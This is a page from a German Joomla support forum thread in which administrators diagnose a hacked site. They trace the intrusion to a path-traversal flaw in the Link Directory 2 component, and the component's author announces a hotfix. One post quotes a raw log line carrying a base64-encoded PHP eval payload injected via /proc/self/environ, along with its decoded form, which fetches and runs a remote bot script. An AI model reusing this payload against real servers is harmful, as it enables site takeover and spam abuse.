+ Antworten
Seite 3 von 3 ErsteErste 1 2 3
Ergebnis 21 bis 30 von 30

Thema: Seite wird seit drei Tagen gehackt

  1. #21
    War schon öfter hier
    Registriert seit
    30.01.2006
    Beiträge
    233
    Bedankte sich
    30
    Erhielt 38 Danksagungen
    in 30 Beiträgen

    Standard

    mal schauen ... dauert mal wieder, bin jetzt den vierten Tag damit beschäftigt ...
    Ich fürchte du wirst noch länger damit beschäftigt sein - wenn du die Lücke nicht findest.
    Joomla neu zu installieren hilft dir da nicht groß weiter. Es gibt bisher keine Hinweise darauf, dass der Angreifer eine nicht bekannte Joomla-Schwachstelle nutzt.

    Es gibt meiner Meinung nach nur 3 Möglichkeiten:
    1) Dein Rechner ist infiziert und jemand späht deine Zugangsdaten aus.
    >>Rechner mal mit Live-Cd scannen und mal das FTP-Log checken

    2) Der Angreifer hat irgendwo in deinem Webspace eine Webshell (Backdoor) hinterlegt und greift immer wieder drauf zu.
    >> Alle Dateien auf dem Webspace löschen, access log mal durchschauen.. insbesondere nach POST Einträgen.

    3) Das Problem liegt eine Ebenen höher beim Hoster
    >> Aus der Erfahrung ist das eher selten der Fall.

  2. #22
    War schon öfter hier
    Registriert seit
    20.02.2006
    Beiträge
    190
    Bedankte sich
    29
    Erhielt 3 Danksagungen
    in 3 Beiträgen

    Standard

    1.) Rechner ist mit Live CD / disinvect von heise gescannt

    2.)

    Log-Auswertung FTP-Server vom 19.-20.
    344* /
    184* /includes/js/logon.xyz-Angriff.html
    39* /index.php?format=feed&type=atom
    30* /index.php?format=feed&type=rss
    18* /guestbook/
    14* /xmlrpc/xyzAngriff.html
    13* /component/adsmanager/?page=show_message_form&mode=0&adid=27
    10* /?option=com_linkdirectory2&controller=../../../../../../../../../../../../../../../proc/self/environ¿
    8* /wp-cron.php?doing_wp_cron
    8* /ucp.php?mode=register
    8* /suche
    8* /?ls=jhG0o60d02

    Log Auswertung 18.-19.4.
    238* /includes/js/logon.xyzAngriff.html
    94* /xmlrpc/xyzAngriff.html
    70* /feed/
    65* /index.php?format=feed&type=atom
    44* /index.php?format=feed&type=rss
    30* /guestbook/
    16* /component/search/?searchword=suche
    11* /wp-cron.php?doing_wp_cron
    11* /component/adsmanager/?page=show_message_form&mode=0&adid=27
    10* /suche


    interessant ist: es gibt keinen Ordner: guestbook
    Was davon könnte auf Sicherheitslücke hinweisen: Komponente: Linkdirectory? ist jetzt wieder deaktiviert worden um es einzukreisen

    xyz-Angriff = die Seite die wiederum von meinem durch das Schad-Skript vom Rechner aus angegriffen wurde :(
    Geändert von JuergenJoomla (20.04.2011 um 23:21 Uhr)

  3. #23
    Kommt häufiger vorbei
    Registriert seit
    30.12.2005
    Ort
    Beerfelden
    Beiträge
    320
    Bedankte sich
    18
    Erhielt 63 Danksagungen
    in 60 Beiträgen

    Standard

    Zitat Zitat von JuergenJoomla Beitrag anzeigen
    1.) R/proc/self/environ¿
    8* /wp-cron.php?doing_wp_cron
    Hi,
    ist da noch eine (alte) Wordpress Installation auf dem Server?
    Grüße aus dem Odenwald
    Thomas
    Joomla 1.5.25 und bald auch 2.5.4
    www.dblt.de - www.bonarei.eu

  4. #24
    War schon öfter hier
    Registriert seit
    30.01.2006
    Beiträge
    233
    Bedankte sich
    30
    Erhielt 38 Danksagungen
    in 30 Beiträgen

    Standard

    Anhand der bislang vorliegenden Informationen, würde ich sagen, hier liegt der Hase im Pfeffer:

    10* /?option=com_linkdirectory2&controller=../../../../../../../../../../../../../../../proc/self/environ¿

    Kannst du diesen Eintrag evtl. nochmal komplett posten?

  5. #25
    Moderator Avatar von flotte
    Registriert seit
    20.03.2005
    Ort
    Neustadt
    Beiträge
    5.301
    Bedankte sich
    66
    Erhielt 1.258 Danksagungen
    in 1.101 Beiträgen

    Standard

    sag mal ist die Seite eigentlich noch online? Scheint mir fast so, wenn Du nun durch "rumprobieren" eine Lücke "einkreisen" willst.
    Du hast bereits einen Hinweis bekommen, das über Deine Seite Phishing betrieben wird. Was muss noch passiert, damit die Seite wirklich vom Netz geht? Vielleicht KiPo-Seiten?
    Leider kann man Dir nicht wirklich durchgreifend helfen, weil Infos nur bruchstückhaft kommen und wir keinen Einblick in die Logs haben.

  6. #26
    Neu an Board
    Registriert seit
    21.11.2005
    Ort
    Berlin
    Beiträge
    74
    Bedankte sich
    7
    Erhielt 3 Danksagungen
    in 2 Beiträgen

    Standard

    Nachdem eine meiner Seiten heute nicht mehr zu erreichen war und ich zeitgleich hunderte "undelivered Mails to Sender" zurück bekommen habe, bin mal schnell auf die suche gegangen und bin in den Logfiles auch gleich fündig geworden.
    In die Componente Linkdirectory2 in der Version 2.0.1 wurde anscheinend diverser Schadcode hochgeladen.
    Im Logfile sieht eine von hunderten Zeilen in etwa so aus:
    /component/linkdirectory2/link/?option=com_linkdirectory2&controller=..//..//..//..//..//..//..//..//..//environ%000 HTTP/1.1" 200 1570 "-" "<?eval(base64_decode('ZWNobyAiYzBsaSMiLnBocF91bmF tZSgpLiIjYzBsaSI7IGlmKEBjb3B5KCJodHRwOi8vd3d3dHRl1 hZ2F6aW5lLmNvbS9ibG9nL21vZHVsZXMvbW9kX2ZlZWQvZXJyb 3JfaWQiLCIvdG1wL2Jl amF0IikpIHsgZWNobyAiU1VDQ0VI7IH0= '));?>"

    Decodiert wird daraus : echo "c0li#".php_uname()."#c0li"; if(@copy("***url entfernt***","/tmp/bejat")) { echo "SUCCESS"; }

    eine ander decodierte Zeile sieht dann so aus:

    system('rm -rf /tmp/xbot;wget ***ur entfernt*** /tmp/xbot;perl /tmp/xbot');


    Meine php Kennisse reichen leider nicht aus um zu verstehen, wie die Jungs dann letztendlich meinen Account zum versenden von einigen tausend Mails benutzen konnten, vielleicht weiss jemand von Euch ja wie das geht.

    Inzwischen gibt es ja die Linkdirectory2 Version 2.1.0, ist dort die Sicherheitslücke geschlossen?

    Anton123
    Geändert von Lacki (26.04.2011 um 22:55 Uhr) Grund: URL zu Hackerscripten entfernt

  7. #27
    Gehört zum Inventar Avatar von ronny7362
    Registriert seit
    04.10.2008
    Ort
    London
    Alter
    50
    Beiträge
    6.741
    Bedankte sich
    184
    Erhielt 2.077 Danksagungen
    in 1.913 Beiträgen

    Standard

    Hi

    vor 3 tagen wurde eine kundenseite von mir auch mit diesem linkdirectory gehackt, und das war die neue version der komponente, das zeigt mal wieder
    aufpassen was man installiert

    gruss ronny

  8. #28
    Neu an Board
    Registriert seit
    21.11.2005
    Ort
    Berlin
    Beiträge
    74
    Bedankte sich
    7
    Erhielt 3 Danksagungen
    in 2 Beiträgen

    Standard

    Hallo ronny7362,

    bei mir ist es leider auch eine Kundenseite mit relativ viel Content. Nachdem ich den Linkdirectoryordner komplett gelöscht hatte ging die Spammerei trotzdem weiter.
    Die sind also viel weiter ins System eingedrungen als auf den Ersten Blick zu sehen war.
    Mein Provider hat mir nun mitgeteilt, dass diese Componente als sehr unsicher gilt und mich gebeten diese nicht erneut zu installieren.
    Auf der Hompage vom Autor hatte ich gestern nacht noch die Frage gestellt ob die php-Injectionmöglichkeit in der neuen 2.1.0 Version zuverlässig verbaut wurde, dieser Kommentar wurde dort aber gelöscht.

    Eigentlich dachte ich am Dateialter sehen zu können in welcher Datei die waren, aber dem ist leider nicht so. Es gibt Datein die Monate alt sind und trotzdem haben die da erst gestern was eingeschleust.

    Ich hab nun alles gelöscht und setze das Joomla neu auf.
    Man hat ja sonst nicht´s zu tun :-(

  9. #29
    Kommt häufiger vorbei Avatar von BennoG
    Registriert seit
    04.12.2009
    Beiträge
    464
    Bedankte sich
    4
    Erhielt 88 Danksagungen
    in 87 Beiträgen

    Standard

    Hallo,

    Zitat Zitat von Anton123 Beitrag anzeigen
    Eigentlich dachte ich am Dateialter sehen zu können in welcher Datei die waren, aber dem ist leider nicht so. Es gibt Datein die Monate alt sind und trotzdem haben die da erst gestern was eingeschleust.
    das Dateierstellungsdatum läßt sich genauso manipulieren, ist also alles ander als aussagekräftig. Wenn Du eine Suchmaschine Deines Misstrauens bemühst, wirst Du die entsprechenden Info's und Tools dazu finden.
    'n Gruß
    Benno

  10. #30
    Neu an Board
    Registriert seit
    09.01.2007
    Beiträge
    49
    Bedankte sich
    0
    Erhielt 16 Danksagungen
    in 10 Beiträgen

    Standard

    Im H2N Link Directory 2 gibt es in der Tat ein gravierendes Sicherheitsproblem. Ursache ist das nicht korrekte Auswerten der Variable controller, die zu den oben beschrieben Problemen führt. Ich habe ein Security Hotfix erstellt, der umgehend zu installieren ist. Details siehe dazu http://www.joomla-hklein.de/?p=967

    Gruß, Harry Klein
    --
    Mein Beitrag zu Joomla: H2N Link Directory - eine Linkververaltung für Joomla 1.0.x und 1.5.x und Mosimage Reloaded für J1.5

+ Antworten
Seite 3 von 3 ErsteErste 1 2 3

Stichworte

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein